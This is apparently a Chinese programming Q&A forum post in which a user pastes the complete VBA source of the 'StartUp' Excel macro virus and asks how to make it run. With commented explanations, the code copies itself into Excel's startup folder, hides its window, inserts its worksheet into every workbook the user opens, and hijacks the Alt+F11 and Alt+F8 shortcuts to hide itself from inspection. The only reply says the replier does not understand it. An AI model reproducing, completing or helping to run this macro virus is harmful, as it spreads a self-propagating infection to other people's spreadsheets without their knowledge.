q9482566 2015-10-28 05:13 采纳率: 0%
浏览 1892

我有一段VB的宏病毒startup病毒代码 我想请问怎么让他运行起来

Sub auto_open()
On Error Resume Next
'如果打开的不是StartUp.xls
If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
Application.ScreenUpdating = False '不刷新屏幕
ThisWorkbook.Sheets("StartUp").Copy '复制StartUp的工作表到当前的工作簿中
ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls") '保存
n$ = ActiveWorkbook.Name
ActiveWindow.Visible = False '隐藏
Workbooks("StartUp.xls").Save
Workbooks(n$).Close (False)
End If
Application.OnSheetActivate = "StartUp.xls!cop" '工作表激活时调用StartUp模块的cop过程
Application.OnKey "%{F11}", "StartUp.xls!escape" '处理alt+F11和alt+F8快捷键,F11打开VB编辑器,F8打开宏窗口时,调用StartUp模块的escape过程
Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub
Sub cop()
On Error Resume Next
'如果当前激活的工作表不是StartUp,则复制StartUp,并把选择原先用户的要激活的工作表
If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
Application.ScreenUpdating = False
n$ = ActiveSheet.Name
Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
Sheets(n$).Select
End If
End Sub
Sub back()
On Error Resume Next
Application.OnKey "%{F8}", "StartUp.xls!escape"
Application.OnKey "%{F11}", "StartUp.xls!escape"
Application.OnSheetActivate = "StartUp.xls!cop"
Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop"
Workbooks.Open Application.StartupPath & "\StartUp.xls"
End Sub

Sub escape()
'这个过程主要是在用户打开宏窗口或是VB编辑器时看不到StartUp
On Error Resume Next
Application.OnSheetActivate = "StartUp.xls!back" '当有工作表被激活时,startup又要回来了。
Application.OnKey "%{F11}"
Application.OnKey "%{F8}"
Application.SendKeys "%{F11}"
Application.SendKeys "%{F8}"
For Each book In Workbooks
Application.DisplayAlerts = False '在删除时,不要显示提示对话框
If book.Name = "StartUp.xls" Then book.Sheets("StartUp").Delete '删除StartUp
Next
For Each book In Workbooks
If book.Name = "StartUp.xls" Then
book.Close '关闭StartUp工作簿
End If
Next
End Sub

  • 写回答

2条回答 默认 最新

  • Alanc_ 2015-10-28 07:05
    关注

    完全看不懂,路过进来看看

    评论

报告相同问题?

悬赏问题

  • ¥30 这是哪个作者做的宝宝起名网站
  • ¥60 版本过低apk如何修改可以兼容新的安卓系统
  • ¥25 由IPR导致的DRIVER_POWER_STATE_FAILURE蓝屏
  • ¥50 有数据,怎么建立模型求影响全要素生产率的因素
  • ¥50 有数据,怎么用matlab求全要素生产率
  • ¥15 TI的insta-spin例程
  • ¥15 完成下列问题完成下列问题
  • ¥15 C#算法问题, 不知道怎么处理这个数据的转换
  • ¥15 YoloV5 第三方库的版本对照问题
  • ¥15 请完成下列相关问题!